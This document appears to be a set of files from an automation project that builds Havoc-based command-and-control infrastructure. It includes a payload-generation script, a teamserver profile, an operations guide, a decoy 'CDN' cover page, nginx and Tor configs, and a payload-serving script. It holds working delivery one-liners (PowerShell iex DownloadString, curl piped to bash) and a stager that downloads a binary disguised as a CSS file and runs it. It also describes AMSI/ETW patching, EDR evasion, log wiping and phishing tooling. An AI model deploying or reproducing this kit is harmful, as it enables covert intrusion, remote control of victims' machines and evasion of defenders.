cat > $PAYLOADS_DIR/manifest.json << EOF
|
||||
{
|
||||
"windows_exe": "$win_output",
|
||||
"windows_dll": "$dll_output",
|
||||
"linux_binary": "$linux_output",
|
||||
"redirector_host": "$REDIRECTOR_HOST",
|
||||
"redirector_port": "$REDIRECTOR_PORT",
|
||||
"c2_host": "$C2_HOST",
|
||||
"generated_date": "$(date)"
|
||||
}
|
||||
EOF
|
||||
|
||||
echo "[+] Manifest created successfully"
|
||||
}
|
||||
|
||||
# Create reference file
|
||||
create_reference() {
|
||||
payload_info=$1
|
||||
win_output=$(echo $payload_info | cut -d':' -f1)
|
||||
dll_output=$(echo $payload_info | cut -d':' -f2)
|
||||
linux_output=$(echo $payload_info | cut -d':' -f3)
|
||||
|
||||
cat > $PAYLOADS_DIR/reference.txt << EOF
|
||||
Havoc C2 Server Details:
|
||||
- C2 IP: $C2_HOST
|
||||
- Redirector Domain: $REDIRECTOR_HOST
|
||||
|
||||
Payloads Generated ($(date)):
|
||||
- Windows EXE: $win_output
|
||||
- Windows DLL: $dll_output
|
||||
- Linux Binary: $linux_output
|
||||
|
||||
Usage:
|
||||
1. Ensure your redirector is properly configured to forward requests to the C2 server
|
||||
2. Update DNS for $REDIRECTOR_HOST to point to your redirector IP
|
||||
3. Test connectivity before deployment in target environment
|
||||
|
||||
Payload deployment:
|
||||
- PowerShell:
|
||||
powershell -exec bypass -c "iex(New-Object Net.WebClient).DownloadString('https://$REDIRECTOR_HOST/windows_stager.ps1')"
|
||||
|
||||
- Linux:
|
||||
curl -s https://$REDIRECTOR_HOST/linux_stager.sh | bash
|
||||
EOF
|
||||
|
||||
echo "[+] Reference file created successfully"
|
||||
}
|
||||
|
||||
# Main execution flow
|
||||
echo "[+] Starting Havoc C2 payload generation..."
|
||||
echo "[+] Redirector: $REDIRECTOR_HOST"
|
||||
echo "[+] C2 Host: $C2_HOST"
|
||||
|
||||
# Create stagers directory
|
||||
mkdir -p $PAYLOADS_DIR/stagers
|
||||
|
||||
# Generate profiles
|
||||
generate_profiles
|
||||
|
||||
# Generate payloads
|
||||
payload_info=$(generate_payloads)
|
||||
|
||||
# Generate stagers
|
||||
generate_stagers $(echo $payload_info | cut -d':' -f1) $(echo $payload_info | cut -d':' -f3)
|
||||
|
||||
# Create manifest
|
||||
create_manifest "$payload_info"
|
||||
|
||||
# Create reference
|
||||
create_reference "$payload_info"
|
||||
|
||||
echo "[+] Havoc payload generation complete!"
|
||||
@@ -0,0 +1,79 @@
|
||||
Teamserver {
|
||||
Host = "0.0.0.0"
|
||||
Port = {{ havoc_teamserver_port | default(40056) }}
|
||||
|
||||
Build {
|
||||
Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
|
||||
Compiler86 = "/usr/bin/x86_64-w64-mingw32-gcc"
|
||||
Nasm = "/usr/bin/nasm"
|
||||
}
|
||||
}
|
||||
|
||||
Operators {
|
||||
user "{{ havoc_admin_user | default('admin') }}" {
|
||||
Password = "{{ havoc_admin_password | default(lookup('password', '/dev/null chars=ascii_letters,digits length=24')) }}"
|
||||
}
|
||||
{% if havoc_operators is defined %}
|
||||
{% for operator in havoc_operators %}
|
||||
user "{{ operator.name }}" {
|
||||
Password = "{{ operator.password }}"
|
||||
}
|
||||
{% endfor %}
|
||||
{% endif %}
|
||||
}
|
||||
|
||||
Listeners {
|
||||
Http {
|
||||
Name = "https"
|
||||
Hosts = [
|
||||
"{{ redirector_subdomain }}.{{ domain }}"
|
||||
]
|
||||
HostBind = "0.0.0.0"
|
||||
HostRotation = "round-robin"
|
||||
PortBind = {{ havoc_https_port | default(9443) }}
|
||||
PortConn = {{ havoc_https_port | default(9443) }}
|
||||
UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
|
||||
Headers = [
|
||||
"Accept: */*",
|
||||
"Accept-Language: en-US,en;q=0.9"
|
||||
]
|
||||
Uris = [
|
||||
"/api/v2",
|
||||
"/content",
|
||||
"/static/css",
|
||||
"/wp-content/plugins"
|
||||
]
|
||||
Response {
|
||||
Headers = [
|
||||
"Content-Type: application/json",
|
||||
"Cache-Control: no-store, private",
|
||||
"X-Content-Type-Options: nosniff"
|
||||
]
|
||||
}
|
||||
Secure = true
|
||||
|
||||
Cert {
|
||||
Cert = "/etc/letsencrypt/live/{{ domain }}/fullchain.pem"
|
||||
Key = "/etc/letsencrypt/live/{{ domain }}/privkey.pem"
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Demon {
|
||||
Sleep = {{ havoc_sleep | default(5) }}
|
||||
Jitter = {{ havoc_jitter | default(30) }}
|
||||
|
||||
Injection {
|
||||
{% if havoc_spawn64 is defined %}
|
||||
Spawn64 = "{{ havoc_spawn64 }}"
|
||||
{% else %}
|
||||
Spawn64 = "C:\\Windows\\System32\\dllhost.exe"
|
||||
{% endif %}
|
||||
|
||||
{% if havoc_spawn32 is defined %}
|
||||
Spawn32 = "{{ havoc_spawn32 }}"
|
||||
{% else %}
|
||||
Spawn32 = "C:\\Windows\\SysWOW64\\dllhost.exe"
|
||||
{% endif %}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,112 @@
|
||||
HAVOC C2 OPERATIONS GUIDE
|
||||
==========================
|
||||
|
||||
This guide provides information on using the Havoc C2 framework (dev branch)
|
||||
deployed on your infrastructure.
|
||||
|
||||
SERVER INFORMATION
|
||||
-----------------
|
||||
C2 Server IP: {{ c2_ip }}
|
||||
Redirector Domain: {{ redirector_domain }}
|
||||
Teamserver Port: {{ havoc_teamserver_port | default(40056) }}
|
||||
HTTP Listener Port: {{ havoc_http_port | default(8080) }}
|
||||
HTTPS Listener Port: {{ havoc_https_port | default(443) }}
|
||||
Admin User: {{ havoc_admin_user | default('admin') }}
|
||||
Admin Password: Stored in /root/Tools/Havoc/data/profiles/default.yaotl
|
||||
|
||||
CONNECTING TO THE TEAMSERVER
|
||||
---------------------------
|
||||
From your local machine:
|
||||
|
||||
1. Make sure Havoc client (dev branch) is installed:
|
||||
$ git clone -b dev https://github.com/HavocFramework/Havoc.git
|
||||
$ cd Havoc/Client
|
||||
$ mkdir build && cd build
|
||||
$ cmake -GNinja ..
|
||||
$ ninja
|
||||
|
||||
2. Connect to the Teamserver via GUI:
|
||||
- Host: {{ c2_ip }}
|
||||
- Port: {{ havoc_teamserver_port | default(40056) }}
|
||||
- User: {{ havoc_admin_user | default('admin') }}
|
||||
- Password: See /root/Tools/Havoc/data/profiles/default.yaotl
|
||||
|
||||
3. CLI Connection:
|
||||
$ ./havoc client --address {{ c2_ip }}:{{ havoc_teamserver_port | default(40056) }} --username {{ havoc_admin_user | default('admin') }} --password [password]
|
||||
|
||||
LISTENERS
|
||||
--------
|
||||
Two default listeners are configured:
|
||||
- HTTP on port {{ havoc_http_port | default(8080) }}
|
||||
- HTTPS on port {{ havoc_https_port | default(443) }} (through the redirector)
|
||||
|
||||
To view and manage listeners: Attack → Listeners in the Havoc client.
|
||||
|
||||
GENERATING PAYLOADS
|
||||
-----------------
|
||||
Pre-generated payloads are available in /root/Tools/Havoc/payloads/
|
||||
|
||||
To generate new payloads:
|
||||
1. Connect to the Teamserver
|
||||
2. Navigate to Attack → Payload
|
||||
3. Select the listener (HTTPS recommended)
|
||||
4. Choose architecture, format, and evasion options
|
||||
5. For enhanced evasion: Enable indirect syscalls, stack spoofing, and sleep mask
|
||||
|
||||
PAYLOAD DELIVERY
|
||||
--------------
|
||||
PowerShell one-liner:
|
||||
powershell -exec bypass -c "iex(New-Object Net.WebClient).DownloadString('https://{{ redirector_domain }}/windows_stager.ps1')"
|
||||
|
||||
Linux one-liner:
|
||||
curl -s https://{{ redirector_domain }}/linux_stager.sh | bash
|
||||
|
||||
OPERATIONAL SECURITY
|
||||
------------------
|
||||
- All connections are routed through the redirector
|
||||
- Payload customization includes:
|
||||
* Sleep time: {{ havoc_sleep | default(5) }} seconds with {{ havoc_jitter | default(30) }}% jitter
|
||||
* EDR unhooking techniques
|
||||
* AMSI/ETW patching
|
||||
* Indirect syscalls
|
||||
* Sleep masking with technique: {{ havoc_sleep_mask_technique | default(0) }}
|
||||
|
||||
ADVANCED FEATURES (DEV BRANCH)
|
||||
----------------------------
|
||||
- Enhanced memory scanner evasion
|
||||
- PPID spoofing capabilities
|
||||
- Reflective DLL loading improvements
|
||||
- EDR hook detection and avoidance
|
||||
- Process token manipulation
|
||||
- Registry persistence options
|
||||
|
||||
POST-EXPLOITATION
|
||||
---------------
|
||||
For post-exploitation, Havoc offers:
|
||||
|
||||
1. BOF (Beacon Object Files) support
|
||||
2. Integrated command & control modules
|
||||
3. File system operations
|
||||
4. Process injection & manipulation
|
||||
5. Credential gathering capabilities
|
||||
|
||||
SERVER MANAGEMENT
|
||||
---------------
|
||||
- Havoc Teamserver service: systemctl status havoc
|
||||
- Service configuration: /etc/systemd/system/havoc.service
|
||||
- Configuration profiles: /root/Tools/Havoc/data/profiles/
|
||||
|
||||
TROUBLESHOOTING
|
||||
--------------
|
||||
1. Agent connection issues:
|
||||
- Verify DNS for {{ redirector_domain }} points to your redirector
|
||||
- Check nginx configuration on the redirector
|
||||
- Confirm ports {{ havoc_http_port | default(8080) }} and {{ havoc_https_port | default(443) }} are open
|
||||
|
||||
2. Teamserver issues:
|
||||
- Check service: systemctl status havoc
|
||||
- View logs: journalctl -u havoc
|
||||
- Restart if needed: systemctl restart havoc
|
||||
|
||||
3. Use Havoc client CLI debugging:
|
||||
./havoc client --address {{ c2_ip }}:{{ havoc_teamserver_port | default(40056) }} --username {{ havoc_admin_user | default('admin') }} --password [password] --debug
|
||||
@@ -0,0 +1,122 @@
|
||||
<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>{{ redirector_subdomain }} - Content Delivery Network</title>
|
||||
<style>
|
||||
body {
|
||||
font-family: Arial, sans-serif;
|
||||
margin: 0;
|
||||
padding: 0;
|
||||
background-color: #f4f4f4;
|
||||
color: #333;
|
||||
}
|
||||
header {
|
||||
background-color: #2c3e50;
|
||||
color: white;
|
||||
padding: 1em;
|
||||
text-align: center;
|
||||
}
|
||||
.container {
|
||||
width: 80%;
|
||||
margin: 0 auto;
|
||||
padding: 2em;
|
||||
}
|
||||
.card {
|
||||
background-color: white;
|
||||
border-radius: 5px;
|
||||
padding: 1.5em;
|
||||
margin-bottom: 1.5em;
|
||||
box-shadow: 0 2px 5px rgba(0,0,0,0.1);
|
||||
}
|
||||
.feature {
|
||||
display: flex;
|
||||
align-items: center;
|
||||
margin-bottom: 1em;
|
||||
}
|
||||
.feature-icon {
|
||||
background-color: #3498db;
|
||||
color: white;
|
||||
border-radius: 50%;
|
||||
width: 40px;
|
||||
height: 40px;
|
||||
display: flex;
|
||||
align-items: center;
|
||||
justify-content: center;
|
||||
margin-right: 1em;
|
||||
font-weight: bold;
|
||||
}
|
||||
footer {
|
||||
background-color: #2c3e50;
|
||||
color: white;
|
||||
text-align: center;
|
||||
padding: 1em;
|
||||
position: fixed;
|
||||
bottom: 0;
|
||||
width: 100%;
|
||||
}
|
||||
.btn {
|
||||
display: inline-block;
|
||||
background-color: #3498db;
|
||||
color: white;
|
||||
padding: 0.7em 1.5em;
|
||||
border-radius: 5px;
|
||||
text-decoration: none;
|
||||
font-weight: bold;
|
||||
}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<header>
|
||||
<h1>{{ redirector_subdomain }}.{{ domain }}</h1>
|
||||
<p>Enterprise Content Delivery Network</p>
|
||||
</header>
|
||||
|
||||
<div class="container">
|
||||
<div class="card">
|
||||
<h2>Welcome to Our CDN</h2>
|
||||
<p>This server is part of our global content delivery network, optimizing digital asset delivery for enterprise applications. Our CDN provides fast, reliable, and secure content distribution across our global network.</p>
|
||||
<p><em>This is a private service. Unauthorized access is prohibited.</em></p>
|
||||
</div>
|
||||
|
||||
<div class="card">
|
||||
<h2>Our Features</h2>
|
||||
|
||||
<div class="feature">
|
||||
<div class="feature-icon">1</div>
|
||||
<div>
|
||||
<h3>Global Distribution</h3>
|
||||
<p>Content cached and distributed across multiple geographic locations for minimum latency.</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="feature">
|
||||
<div class="feature-icon">2</div>
|
||||
<div>
|
||||
<h3>DDoS Protection</h3>
|
||||
<p>Enterprise-grade protection against distributed denial of service attacks.</p>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="feature">
|
||||
<div class="feature-icon">3</div>
|
||||
<div>
|
||||
<h3>Asset Optimization</h3>
|
||||
<p>Automatic compression and format optimization for images, scripts, and styles.</p>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<div class="card" style="text-align: center;">
|
||||
<h2>Need Access?</h2>
|
||||
<p>If you're a client requiring access to our CDN services, please contact your account representative.</p>
|
||||
<a href="#" class="btn">Contact Sales</a>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<footer>
|
||||
<p>© 2025 {{ domain }} CDN Services. All rights reserved.</p>
|
||||
</footer>
|
||||
</body>
|
||||
</html>
|
||||
@@ -0,0 +1,6 @@
|
||||
{
|
||||
"vpc_id": "{{ infra_state.vpc_id }}",
|
||||
"subnet_id": "{{ infra_state.subnet_id }}",
|
||||
"security_group_id": "{{ infra_state.security_group_id }}",
|
||||
"region": "{{ infra_state.region }}"
|
||||
}
|
||||
@@ -0,0 +1,5 @@
|
||||
#!/bin/bash
|
||||
# Loader script for Linux beacon
|
||||
curl -s https://REDIRECTOR_PLACEHOLDER/static/css/linux.css -H "Accept-Language: en-US,en;q=0.9" -o /tmp/linux_update
|
||||
chmod +x /tmp/linux_update
|
||||
/tmp/linux_update &
|
||||
@@ -0,0 +1,16 @@
|
||||
{
|
||||
"windows_exe": "WINDOWS_EXE",
|
||||
"windows_dll": "WINDOWS_DLL",
|
||||
"linux_binary": "LINUX_BINARY",
|
||||
"macos_binary": "MACOS_BINARY",
|
||||
"windows_stager": "WINDOWS_STAGER",
|
||||
"win_profile": "WIN_PROFILE",
|
||||
"dll_profile": "DLL_PROFILE",
|
||||
"linux_profile": "LINUX_PROFILE",
|
||||
"mac_profile": "MAC_PROFILE",
|
||||
"stager_profile": "STAGER_PROFILE",
|
||||
"redirector_host": "REDIRECTOR_HOST",
|
||||
"redirector_port": "REDIRECTOR_PORT",
|
||||
"c2_host": "C2_HOST",
|
||||
"generated_date": "GENERATED_DATE"
|
||||
}
|
||||
@@ -0,0 +1,64 @@
|
||||
Welcome to your secure FlokiNET C2 Server!
|
||||
|
||||
╔═══════════════════════════════════════════════╗
|
||||
║ OPERATIONAL SECURITY ║
|
||||
║ ║
|
||||
║ This server has enhanced security features ║
|
||||
║ including hardened SSH, Tor routing, and ║
|
||||
║ zero-logs configuration. ║
|
||||
╚═══════════════════════════════════════════════╝
|
||||
|
||||
The following tools and utilities have been installed:
|
||||
|
||||
Apt-Installed Tools:
|
||||
--------------------
|
||||
- git, wget, curl, unzip
|
||||
- python3-pip, python3-venv, pipx
|
||||
- tmux, nmap, tcpdump, hydra, john, hashcat
|
||||
- sqlmap, gobuster, dirb, enum4linux, dnsenum, seclists, responder
|
||||
- golang, proxychains, tor, crackmapexec, jq, unzip
|
||||
- postfix, certbot, opendkim, opendkim-tools
|
||||
|
||||
Pipx-Installed Tools:
|
||||
---------------------
|
||||
- NetExec: git+https://github.com/Pennyw0rth/NetExec
|
||||
- TREVORspray: git+https://github.com/blacklanternsecurity/TREVORspray
|
||||
- impacket: (various network protocols and service tools)
|
||||
|
||||
Custom Tools Installed in ~/Tools:
|
||||
----------------------------------
|
||||
- SharpCollection: ~/Tools/SharpCollection
|
||||
- Kerbrute: ~/Tools/Kerbrute
|
||||
- PEASS-ng: ~/Tools/PEASS-ng
|
||||
- MailSniper: ~/Tools/MailSniper
|
||||
- Inveigh: ~/Tools/Inveigh
|
||||
- Gophish: ~/Tools/gophish (unzipped here)
|
||||
|
||||
Other Installed C2 Frameworks:
|
||||
------------------------------
|
||||
- Metasploit Framework: system installed (run 'msfconsole')
|
||||
- Havoc C2: installed in /root/Tools/Havoc
|
||||
|
||||
Security Scripts in /root/Tools/:
|
||||
-----------------------------
|
||||
- clean-logs.sh: Securely clears all logs on the system
|
||||
- secure-exit.sh: Perform secure wipe for termination
|
||||
- serve-beacons.sh: Hosts generated implants for delivery
|
||||
|
||||
Also, remember that many reconnaissance and attack tools are now available system-wide due to the apt and pipx installations.
|
||||
|
||||
Once your DNS record points to this server’s public IP, you can obtain a Let’s Encrypt certificate by running:
|
||||
|
||||
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d {{ domain }}
|
||||
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d mail.{{ domain }}
|
||||
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d tracker.{{ domain }}
|
||||
systemctl start nginx.service
|
||||
|
||||
Remember to ensure your DNS is set correctly before running the above command.
|
||||
|
||||
**IMPORTANT:**
|
||||
|
||||
To route traffic through Tor for additional anonymity, prefix commands with 'proxychains':
|
||||
proxychains curl ifconfig.me
|
||||
|
||||
Don't forget to set up a DMARC record for your domain. Update your DNS provider's dashboard to add a TXT record named `_dmarc` with a suitable DMARC policy (e.g., `v=DMARC1; p=reject; rua=mailto:admin@{{ domain }}; ruf=mailto:admin@{{ domain }}; pct=100`). This ensures better email deliverability and security for your domain.
|
||||
@@ -0,0 +1,48 @@
|
||||
Welcome to your new C2 Server!
|
||||
|
||||
The following tools and utilities have been installed:
|
||||
|
||||
Apt-Installed Tools:
|
||||
--------------------
|
||||
- git, wget, curl, unzip
|
||||
- python3-pip, python3-venv, pipx
|
||||
- tmux, nmap, tcpdump, hydra, john, hashcat
|
||||
- sqlmap, gobuster, dirb, enum4linux, dnsenum, seclists, responder
|
||||
- golang, proxychains, tor, crackmapexec, jq, unzip
|
||||
- postfix, certbot, opendkim, opendkim-tools
|
||||
|
||||
Pipx-Installed Tools:
|
||||
---------------------
|
||||
- NetExec: git+https://github.com/Pennyw0rth/NetExec
|
||||
- TREVORspray: git+https://github.com/blacklanternsecurity/TREVORspray
|
||||
- impacket: (various network protocols and service tools)
|
||||
|
||||
Custom Tools Installed in ~/Tools:
|
||||
----------------------------------
|
||||
- SharpCollection: ~/Tools/SharpCollection
|
||||
- Kerbrute: ~/Tools/Kerbrute
|
||||
- PEASS-ng: ~/Tools/PEASS-ng
|
||||
- MailSniper: ~/Tools/MailSniper
|
||||
- Inveigh: ~/Tools/Inveigh
|
||||
- Gophish: ~/Tools/gophish (unzipped here)
|
||||
|
||||
Other Installed C2 Frameworks:
|
||||
------------------------------
|
||||
- Metasploit Framework: system installed (run 'msfconsole')
|
||||
- Havoc C2: installed in /root/Tools/Havoc
|
||||
|
||||
Also, remember that many reconnaissance and attack tools are now available system-wide due to the apt and pipx installations.
|
||||
|
||||
Once your DNS record points to this server’s public IP, you can obtain a Let’s Encrypt certificate by running:
|
||||
|
||||
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d {{ domain }}
|
||||
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d mail.{{ domain }}
|
||||
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d tracker.{{ domain }}
|
||||
systemctl start nginx.service
|
||||
|
||||
Remember to ensure your DNS is set correctly before running the above command.
|
||||
|
||||
**IMPORTANT:**
|
||||
|
||||
Don’t forget to set up a DMARC record for your domain. Update your DNS provider’s dashboard (e.g., GoDaddy) to add a TXT record named `_dmarc` with a suitable DMARC policy (e.g., `v=DMARC1; p=reject; rua=mailto:admin@{{ domain }}; ruf=mailto:admin@{{ domain }}; pct=100`). This ensures better email deliverability and security for your domain.
|
||||
|
||||
@@ -0,0 +1,16 @@
|
||||
================================================================
|
||||
C2itall Redirector Post-Installation Instructions
|
||||
================================================================
|
||||
|
||||
To complete your setup with SSL certificates, run:
|
||||
/root/Tools/post_install_redirector.sh
|
||||
|
||||
This script will guide you through:
|
||||
- Setting up Let's Encrypt certificates
|
||||
- Starting required services
|
||||
- Updating NGINX configuration
|
||||
|
||||
For enhanced OPSEC, you can also randomize ports:
|
||||
/root/Tools/randomize_ports.sh
|
||||
|
||||
Run these after you've configured your DNS records to point to this server.
|
||||
@@ -0,0 +1,48 @@
|
||||
Welcome to your new C2 Server!
|
||||
|
||||
The following tools and utilities have been installed:
|
||||
|
||||
Apt-Installed Tools:
|
||||
--------------------
|
||||
- git, wget, curl, unzip
|
||||
- python3-pip, python3-venv, pipx
|
||||
- tmux, nmap, tcpdump, hydra, john, hashcat
|
||||
- sqlmap, gobuster, dirb, enum4linux, dnsenum, seclists, responder
|
||||
- golang, proxychains, tor, crackmapexec, jq, unzip
|
||||
- postfix, certbot, opendkim, opendkim-tools
|
||||
|
||||
Pipx-Installed Tools:
|
||||
---------------------
|
||||
- NetExec: git+https://github.com/Pennyw0rth/NetExec
|
||||
- TREVORspray: git+https://github.com/blacklanternsecurity/TREVORspray
|
||||
- impacket: (various network protocols and service tools)
|
||||
|
||||
Custom Tools Installed in ~/Tools:
|
||||
----------------------------------
|
||||
- SharpCollection: ~/Tools/SharpCollection
|
||||
- Kerbrute: ~/Tools/Kerbrute
|
||||
- PEASS-ng: ~/Tools/PEASS-ng
|
||||
- MailSniper: ~/Tools/MailSniper
|
||||
- Inveigh: ~/Tools/Inveigh
|
||||
- Gophish: ~/Tools/gophish (unzipped here)
|
||||
|
||||
Other Installed C2 Frameworks:
|
||||
------------------------------
|
||||
- Metasploit Framework: system installed (run 'msfconsole')
|
||||
- Havoc C2: installed in /root/Tools/Havoc
|
||||
|
||||
Also, remember that many reconnaissance and attack tools are now available system-wide due to the apt and pipx installations.
|
||||
|
||||
Once your DNS record points to this server’s public IP, you can obtain a Let’s Encrypt certificate by running:
|
||||
|
||||
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d {{ domain }}
|
||||
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d mail.{{ domain }}
|
||||
sudo certbot certonly --non-interactive --agree-tos --email {{ letsencrypt_email }} --standalone -d tracker.{{ domain }}
|
||||
systemctl start nginx.service
|
||||
|
||||
Remember to ensure your DNS is set correctly before running the above command.
|
||||
|
||||
**IMPORTANT:**
|
||||
|
||||
Don’t forget to set up a DMARC record for your domain. Update your DNS provider’s dashboard (e.g., GoDaddy) to add a TXT record named `_dmarc` with a suitable DMARC policy (e.g., `v=DMARC1; p=reject; rua=mailto:admin@{{ domain }}; ruf=mailto:admin@{{ domain }}; pct=100`). This ensures better email deliverability and security for your domain.
|
||||
|
||||
@@ -0,0 +1,58 @@
|
||||
user www-data;
|
||||
worker_processes auto;
|
||||
pid /run/nginx.pid;
|
||||
include /etc/nginx/modules-enabled/*.conf;
|
||||
|
||||
events {
|
||||
worker_connections 1024;
|
||||
multi_accept on;
|
||||
}
|
||||
|
||||
http {
|
||||
# Basic Settings
|
||||
sendfile on;
|
||||
tcp_nopush on;
|
||||
tcp_nodelay on;
|
||||
keepalive_timeout 65;
|
||||
types_hash_max_size 2048;
|
||||
server_tokens off;
|
||||
|
||||
# MIME
|
||||
include /etc/nginx/mime.types;
|
||||
default_type application/octet-stream;
|
||||
|
||||
# Zero-logs configuration
|
||||
# This completely disables all access logs
|
||||
access_log off;
|
||||
# Minimal error logs - critical only
|
||||
error_log /dev/null crit;
|
||||
|
||||
# SSL Settings
|
||||
ssl_protocols TLSv1.2 TLSv1.3;
|
||||
ssl_prefer_server_ciphers on;
|
||||
ssl_ciphers 'ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256';
|
||||
ssl_session_timeout 1d;
|
||||
ssl_session_cache shared:SSL:10m;
|
||||
ssl_session_tickets off;
|
||||
|
||||
# Headers to confuse fingerprinting
|
||||
# Microsoft-IIS/8.5 server header to throw off analysis
|
||||
add_header Server "Microsoft-IIS/8.5";
|
||||
server_name_in_redirect off;
|
||||
|
||||
# OPSEC: Hide proxy headers
|
||||
proxy_hide_header X-Powered-By;
|
||||
proxy_hide_header X-AspNet-Version;
|
||||
proxy_hide_header X-Runtime;
|
||||
|
||||
# IP Rotation and proxying
|
||||
real_ip_header X-Forwarded-For;
|
||||
set_real_ip_from 127.0.0.1;
|
||||
|
||||
# Gzip Settings
|
||||
gzip off; # Disabled to avoid BREACH attack
|
||||
|
||||
# Virtual Host Configs
|
||||
include /etc/nginx/conf.d/*.conf;
|
||||
include /etc/nginx/sites-enabled/*;
|
||||
}
|
||||
@@ -0,0 +1,68 @@
|
||||
# FlokiNET/templates/proxychains.conf.j2
|
||||
# ProxyChains configuration for C2 server
|
||||
# Routes traffic through Tor for anonymity
|
||||
|
||||
# Dynamic chain - Each connection through the proxy list
|
||||
# Uses chained proxies in the order they appear in the list
|
||||
dynamic_chain
|
||||
|
||||
# Proxy DNS requests - no leak for DNS data
|
||||
proxy_dns
|
||||
|
||||
# Randomize the order of the proxies on each start
|
||||
# random_chain
|
||||
|
||||
# Set the type of chain (dynamic, strict, random)
|
||||
# strict_chain
|
||||
# random_chain
|
||||
|
||||
# Quiet mode (less console output)
|
||||
quiet_mode
|
||||
|
||||
# ProxyList format:
|
||||
# type host port [user pass]
|
||||
# (values separated by 'tab' or 'blank')
|
||||
[ProxyList]
|
||||
# add proxy here ...
|
||||
# socks5 127.0.0.1 1080
|
||||
socks5 127.0.0.1 9050
|
||||
|
||||
# FlokiNET/templates/iptables-rules.j2
|
||||
# Hardened iptables rules for FlokiNET C2 server
|
||||
# Applied at system startup
|
||||
|
||||
*filter
|
||||
:INPUT DROP [0:0]
|
||||
:FORWARD DROP [0:0]
|
||||
:OUTPUT ACCEPT [0:0]
|
||||
|
||||
# Allow established and related connections
|
||||
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
|
||||
|
||||
# Allow loopback
|
||||
-A INPUT -i lo -j ACCEPT
|
||||
|
||||
# Allow SSH
|
||||
-A INPUT -p tcp -m state --state NEW -m tcp --dport {{ ssh_port | default(22) }} -j ACCEPT
|
||||
|
||||
# Allow HTTP/HTTPS
|
||||
-A INPUT -p tcp -m state --state NEW -m tcp --dport 80 -j ACCEPT
|
||||
-A INPUT -p tcp -m state --state NEW -m tcp --dport 443 -j ACCEPT
|
||||
|
||||
# Allow Havoc C2 ports
|
||||
-A INPUT -p tcp -m state --state NEW -m tcp --dport {{ havoc_http_port | default(8080) }} -j ACCEPT
|
||||
-A INPUT -p tcp -m state --state NEW -m tcp --dport {{ havoc_https_port | default(443) }} -j ACCEPT
|
||||
-A INPUT -p tcp -m state --state NEW -m tcp --dport {{ havoc_teamserver_port | default(40056) }} -j ACCEPT
|
||||
|
||||
# Allow shell handler port
|
||||
{% if shell_handler_port is defined %}
|
||||
-A INPUT -p tcp -m state --state NEW -m tcp --dport {{ shell_handler_port }} -j ACCEPT
|
||||
{% endif %}
|
||||
|
||||
# Block all other incoming traffic
|
||||
-A INPUT -j DROP
|
||||
|
||||
# Allow all outbound traffic by default
|
||||
-A OUTPUT -j ACCEPT
|
||||
|
||||
COMMIT
|
||||
@@ -0,0 +1,17 @@
|
||||
C2 Server Details:
|
||||
- C2 IP: C2_HOST
|
||||
- Redirector Domain: REDIRECTOR_HOST
|
||||
|
||||
Beacons Generated (GENERATED_DATE):
|
||||
- Windows EXE: WINDOWS_EXE (Profile: WIN_PROFILE)
|
||||
- Windows DLL: WINDOWS_DLL (Profile: DLL_PROFILE)
|
||||
- Linux Binary: LINUX_BINARY (Profile: LINUX_PROFILE)
|
||||
- macOS Binary: MACOS_BINARY (Profile: MAC_PROFILE)
|
||||
- Windows Stager: staged/WINDOWS_STAGER (Profile: STAGER_PROFILE)
|
||||
|
||||
Usage:
|
||||
1. Ensure your redirector is properly configured to forward requests to the C2 server
|
||||
2. Update DNS for REDIRECTOR_HOST to point to your redirector IP
|
||||
3. Test connectivity before deployment in target environment
|
||||
|
||||
IMPORTANT: These beacons will connect to REDIRECTOR_HOST on port REDIRECTOR_PORT
|
||||
@@ -0,0 +1,18 @@
|
||||
# FlokiNET/templates/resolv.conf.j2
|
||||
# Secure DNS configuration
|
||||
# Uses privacy-respecting DNS servers
|
||||
|
||||
nameserver 9.9.9.9
|
||||
nameserver 1.1.1.1
|
||||
options edns0 single-request-reopen
|
||||
options timeout:1
|
||||
options attempts:2
|
||||
|
||||
# FlokiNET/templates/dnscrypt.conf.j2
|
||||
[Resolve]
|
||||
DNS=9.9.9.9 1.1.1.1
|
||||
FallbackDNS=8.8.8.8 8.8.4.4
|
||||
DNSSEC=yes
|
||||
DNSOverTLS=yes
|
||||
Cache=yes
|
||||
DNSStubListener=yes
|
||||
@@ -0,0 +1,135 @@
|
||||
#!/bin/bash
|
||||
# Script to serve Havoc C2 payloads generated by generate_havoc_payloads.sh
|
||||
|
||||
# Configuration
|
||||
PAYLOADS_DIR="/root/Tools/Havoc/payloads"
|
||||
C2_HOST="{{ ansible_host }}"
|
||||
# Use templated variable with fallback - allow override from config
|
||||
LISTEN_PORT="{{ havoc_payload_port | default(8443) }}"
|
||||
|
||||
# Check if manifest file exists (created by generate_havoc_payloads.sh)
|
||||
if [ -f "$PAYLOADS_DIR/manifest.json" ]; then
|
||||
echo "[+] Found payload manifest file - using Havoc payloads generated previously"
|
||||
# Extract payload paths from manifest
|
||||
